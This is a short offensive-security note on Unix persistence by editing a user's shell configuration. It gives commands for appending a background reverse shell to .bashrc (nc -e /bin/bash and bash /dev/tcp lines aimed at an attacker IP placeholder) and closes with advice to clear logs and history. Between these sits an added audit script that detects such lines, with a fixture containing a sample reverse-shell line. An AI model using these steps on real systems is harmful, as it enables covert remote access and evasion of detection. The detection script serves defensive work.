## General
In Unix-like operating systems, the shell is the command-line interface that users can use to interact with the system. When a user logs in, their default shell is started and they are presented with a prompt where they can enter commands. Each user on the system has a default shell that is specified in the system's configuration, and the user can choose to use a different shell if they prefer.

An attacker who has gained access to a system can modify the shell configuration of a user in order to maintain persistence on the system. This can be done by changing the user's default shell to a shell that has been modified by the attacker in some way. For example, the attacker could modify the shell so that it automatically runs a script or command every time the user logs in, or so that it hides the presence of the attacker's files or processes on the system.

By modifying the shell configuration in this way, the attacker can maintain persistence on the system even after a reboot or after they have logged out. This can allow the attacker to continue to perform actions or gather sensitive data over an extended period of time without being detected.

## Commands

Find the Default Shell of users

```
cat /etc/passwd   # check for /bin/bash
```

If a user has something other than /bin/bash (e.g. /bin/sh), that means the user will have a `.bashrc` in their home folder (`.bashrc` lets you modify the bash shell at launch).

Add Reverse Shell

```
# Edit the code
nano .bashrc

# Add a bash reverse shell at the end of the code
nc -e /bin/bash Attacker_IP PORT 2>/dev/null &

# or
bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1 &
```

- `&` puts the command in the background
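
To check a host for the two changes described on this page (a replaced login shell, or a network callback appended to `.bashrc`), the following audit script is an added example and not part of the original note. The function names and sample data are this example's own, and treating `/etc/shells` as the allow-list and these two patterns as suspicious are assumptions to tune per environment.

```shell
#!/bin/sh
# Added defensive example: audit login shells and startup files for the
# persistence described above. Function names are this example's own.

# Print "user:shell" for accounts whose login shell is not listed in the
# shells file ($2, /etc/shells format). $1 is a passwd-format file.
unlisted_shells() {
    awk -F: -v shells="$2" '
        BEGIN { while ((getline l < shells) > 0) if (l != "" && l !~ /^#/) ok[l] = 1 }
        $7 != "" && $7 !~ /\/(nologin|false)$/ && !($7 in ok) { print $1 ":" $7 }
    ' "$1"
}

# Print "file:line:text" for non-comment startup-file lines that open a
# /dev/tcp or /dev/udp socket or run netcat with -e.
suspicious_rc_lines() {
    pat='/dev/(tcp|udp)/|(^|[^[:alnum:]_])(nc|ncat|netcat)[[:space:]]+(.*[[:space:]])?-[[:alnum:]]*e([[:space:]]|$)'
    for f in "$@"; do
        [ -f "$f" ] || continue
        grep -nE "$pat" "$f" /dev/null | grep -vE '^[^:]*:[0-9]+:[[:space:]]*#' || true
    done
}

# Constructed sample data (not from a real host); 192.0.2.10 is a
# documentation address.
make_fixture() {
    mkdir -p "$1/home/bob"
    printf '%s\n' '# /etc/shells' /bin/sh /bin/bash > "$1/shells"
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
        'bob:x:1000:1000::/home/bob:/bin/bash' \
        'carol:x:1001:1001::/home/carol:/tmp/.cache/sh' > "$1/passwd"
    printf '%s\n' \
        'alias ll="ls -l"' \
        '# nc -e /bin/bash 192.0.2.10 4444' \
        'export EDITOR=nano' \
        'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1 &' > "$1/home/bob/.bashrc"
}

# Demo run against the constructed fixture.
demo_dir=$(mktemp -d)
make_fixture "$demo_dir"
unlisted_shells "$demo_dir/passwd" "$demo_dir/shells"
suspicious_rc_lines "$demo_dir"/home/*/.bashrc
rm -rf "$demo_dir"
```

On a real host, call `unlisted_shells /etc/passwd /etc/shells` and `suspicious_rc_lines /home/*/.bashrc /root/.bashrc`; hits are leads to review, not proof of compromise.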

===Don't Forget to Clear Tracks (Check [[🧹 CLEAR Logs & History]])===